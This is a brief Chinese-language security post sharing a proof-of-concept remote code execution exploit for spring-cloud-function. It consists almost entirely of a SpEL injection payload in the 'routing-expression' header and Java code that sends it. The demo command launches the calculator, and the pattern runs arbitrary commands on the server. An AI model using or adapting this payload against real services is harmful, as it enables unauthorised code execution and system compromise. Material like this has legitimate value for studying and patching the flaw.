点击上方蓝字“Ots安全”一起玩耍
spring-spel-0day-poc
这是 spring-cloud/spring-cloud-function Remote Code Exploit POC
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -acalculator.app")
POC:
Function function = functionCatalog.lookup(RoutingFunction.FUNCTION_NAME);Message<String> message = MessageBuilder.withPayload("hello").setHeader(FunctionProperties.PREFIX + ".routing-expression","T(java.lang.Runtime).getRuntime().exec(\"open -a calculator.app\")").build();function.apply(message);
文章评论